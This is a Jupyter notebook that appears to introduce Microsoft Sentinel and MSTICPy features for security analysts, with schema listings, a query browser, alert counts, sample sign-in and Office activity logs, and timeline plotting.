{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# An introduction to Cybersec notebook features\n", "\n", "---\n", "\n", "# Contents\n", "\n", "- Introduction\n", "- Setting up the notebook environment\n", "- Querying data from Microsoft Sentinel\n", "- Visualizing data\n", "- Enriching data\n", "- Analyzing data\n", "- Using Pivot functions\n", "- Appendices\n", " - Additional resources\n", " - A brief introduction to pandas DataFrames\n", "\n", "---\n", "\n", "# Introduction\n", "\n", "This notebook takes you through some of the features of Microsoft Sentinel Notebooks and MSTICPy.\n", "\n", "If you are new to notebooks we strongly recommend starting with the:\n", "**A Getting Started Guide For Microsoft Sentinel ML notebooks**.\n", "\n", "After you've finished running this notebook, we also recommend:\n", "\n", "- **Configuring your environment** - this covers all of the configuration options for \n", " accessing external cybersec resources\n", "\n", "Each topic includes 'learn more' sections to provide you with the resource to deep\n", "dive into each of these topics. We encourage you to work through the notebook from start\n", "to finish.\n", "\n", "
1. Demo is still downloaded even if chose Microsoft Sentinel (although this is\n",
" cached after the first download). The demo data
\n",
"is used as a backup if the queries to the Microsoft Sentinel workspace return\n",
"no data.
2. If you see a warning \"Runtime dependency of PyGObject is missing\" when loading the
\n",
"Microsoft Sentinel driver please see the FAQ section at the end of the \n",
" A Getting Started Guide For Microsoft Sentinel ML Notebooks notebook.
Using Microsoft Sentinel as primary data source.
\n", "Please copy the code and click on the URL to authenticate\n", " to Microsoft Sentinel if prompted to do so.
\n", "Using Microsoft Sentinel as primary data source.
\n", "Please copy the code and click on the URL to authenticate\n", " to Microsoft Sentinel if prompted to do so.
\n", "Using local data as primary data source.
\n", "Note:\n", "For local data this will just appear as a list of files.\n", "
" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['AACAudit',\n", " 'AACHttpRequest',\n", " 'AADDomainServicesAccountLogon',\n", " 'AADDomainServicesAccountManagement',\n", " 'AADDomainServicesDirectoryServiceAccess',\n", " 'AADDomainServicesLogonLogoff',\n", " 'AADDomainServicesPolicyChange',\n", " 'AADDomainServicesPrivilegeUse',\n", " 'AADDomainServicesSystemSecurity',\n", " 'AADManagedIdentitySignInLogs']" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Get list of tables in our Workspace with the 'schema_tables' property\n", "qry_prov.schema_tables[:10] # We are outputting only a sample (first 10) tables for brevity\n", " # remove the \"[:10]\" to see the whole list\n" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "{\n", " \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AlternateSignInName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AppDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AuthenticationDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AuthenticationMethodsUsed\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AuthenticationProcessingDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AuthenticationRequirement\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"AuthenticationRequirementPolicies\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ClientAppUsed\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ConditionalAccessPolicies\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n", " \u001b[94m\"ConditionalAccessStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"CreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n", " \u001b[94m\"DeviceDetail\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n", " \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n", " \u001b[94m\"FlaggedForReview\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n", " \u001b[94m\"HomeTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"IPAddressFromResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"IsInteractive\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n", " \u001b[94m\"IsRisky\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n", " \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"LocationDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n", " \u001b[94m\"MfaDetail\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n", " \u001b[94m\"NetworkLocationDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"OriginalRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ProcessingTimeInMilliseconds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceIdentity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResourceTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskDetail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskEventTypes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskEventTypes_V2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskLevelAggregated\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskLevelDuringSignIn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"RiskState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ServicePrincipalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"ServicePrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"SignInIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"SignInIdentifierType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n", " \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n", " \u001b[94m\"TokenIssuerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"TokenIssuerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"UserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n", " \u001b[94m\"UserType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n", "}\n", "\n" ] } ], "source": [ "# Display the schema for a single table\n", "if qry_prov.environment == \"AzureSentinel\":\n", " print(qry_prov.schema['SigninLogs'])\n", "else:\n", " md(\n", " \"Note: this is the schema of a local pandas DataFrame\"\n", " \" that emulates the Microsoft Sentinel schema\"\n", " )\n", " display(qry_prov.Azure.list_all_signins_geo().dtypes)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## MSTICPy Query browser\n", "\n", "MSTICPy includes a number of built in queries.\n", "Most require additional parameters such as the time range and often an\n", "identifying parameter such as the host name, account name or IP address that\n", "you are querying for.\n", "\n", "You also can list available queries from Python code with:\n", "```\n", "qry_prov.list_queries()\n", "```\n", "Get specific details about a query by calling it with \"?\" as a parameter:\n", "```\n", "qry_prov.Azure.list_all_signins_geo(\"?\")\n", "```" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Query browser\n", "\n", "The query browser combines both of these functions in a scrollable\n", "and filterable list." ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "8d2157a62e404bd5a36ff25f0b4f10d5", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "Parameters
Query
{table} \n", "| where TimeGenerated >= datetime({start}) \n", "| where TimeGenerated <= datetime({end}) \n", "| where Computer has \"{host_name}\" \n", "| take 1
Example
\n", "{QueryProvider}[.QueryPath].QueryName(params...)
\n", "qry_prov.Azure.get_vmcomputer_for_host(start=start, end=end, hostname=host)\n", " " ], "text/plain": [ "
\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9558f30b-a1db-4676-a586-7db608bdaa69 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:21.6485011+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.73078155517578 | \n", "-78.17196655273438 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "dac1edbe-1985-4f78-8d20-f4725e28b865 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:26.2522747+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.7130012512207 | \n", "-78.15899658203125 | \n", "
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Arseny Vasilev | \n", "4 | \n", "RU | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T11:36:15.8961297+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Arseny Vasilev | \n", "9267d02c-5f76-40a9-a9eb-b686f3ca47aa | \n", "avasilev@viacode.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "5fccd68a-e65e-46ae-96b1-2d896d680249 | \n", "SigninLogs | \n", "Sucess | \n", "59.93904113769531 | \n", "30.3157901763916 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "d1c11047-9e6d-4814-80fc-334c453582a3 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:50.2743176+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "60855931-eec4-466c-a24e-ba630c087a3e | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:44.9579314+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
5 rows 69 columns
\n", "start=datetime.utcnow() - timedelta(20),\n", "
\n", " | AlertName | \n", "NumAlerts | \n", "
---|---|---|
0 | \n", "Suspected brute-force attack (LDAP) | \n", "115 | \n", "
1 | \n", "Users with Greater Than 1 City | \n", "4 | \n", "
2 | \n", "Incident and Automation testing 01 | \n", "543 | \n", "
3 | \n", "Malicious credential theft tool execution detected | \n", "118 | \n", "
4 | \n", "TI map IP entity to AzureActivity (enriched) | \n", "48 | \n", "
Note:\n", "exec_query is not supported for local data.\n", "
" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", " | TenantId | \n", "Application | \n", "UserDomain | \n", "UserAgent | \n", "RecordType | \n", "TimeGenerated | \n", "Operation | \n", "OrganizationId | \n", "OrganizationId_ | \n", "UserType | \n", "UserKey | \n", "OfficeWorkload | \n", "ResultStatus | \n", "ResultReasonType | \n", "OfficeObjectId | \n", "UserId | \n", "UserId_ | \n", "ClientIP | \n", "ClientIP_ | \n", "Scope | \n", "Site_ | \n", "ItemType | \n", "EventSource | \n", "Source_Name | \n", "MachineDomainInfo | \n", "... | \n", "ChannelType | \n", "ChannelName | \n", "ChannelGuid | \n", "ExtraProperties | \n", "AddOnType | \n", "AddonName | \n", "TabType | \n", "Name | \n", "OldValue | \n", "NewValue | \n", "ItemName | \n", "ChatThreadId | \n", "ChatName | \n", "CommunicationType | \n", "AADGroupId | \n", "AddOnGuid | \n", "AppDistributionMode | \n", "TargetUserId | \n", "OperationScope | \n", "AzureADAppId | \n", "OperationProperties | \n", "AppId | \n", "ClientAppId | \n", "Type | \n", "_ResourceId | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 12:29:44+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 12:29:44+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | ExchangeAdmin | \n", "2021-06-28 12:29:33+00:00 | \n", "Set-User | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "DcAdmin | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "Exchange | \n", "True | \n", "True | \n", "NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com... | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | OfficeActivity | \n", "\n", " |
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | ExchangeAdmin | \n", "2021-06-28 12:38:05+00:00 | \n", "Set-User | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "DcAdmin | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "Exchange | \n", "True | \n", "True | \n", "NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com... | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | OfficeActivity | \n", "\n", " |
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 14:46:35+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
5 rows 131 columns
\n", "df.mp_timeline.plot(time_column=\"EventStartTimeUTC\", ...)\n", "2. If there are a lot of logons in your query result the timeline may appear
from msticpy.nbtools.timeline import display_timeline, display_timeline_values\n", "from msticpy.nbtools.timeline_duration import display_timeline_duration\n", "\n", "display_timeline(data, ...[other params])\n", "\n", "display_timeline - shows events as discrete diamonds
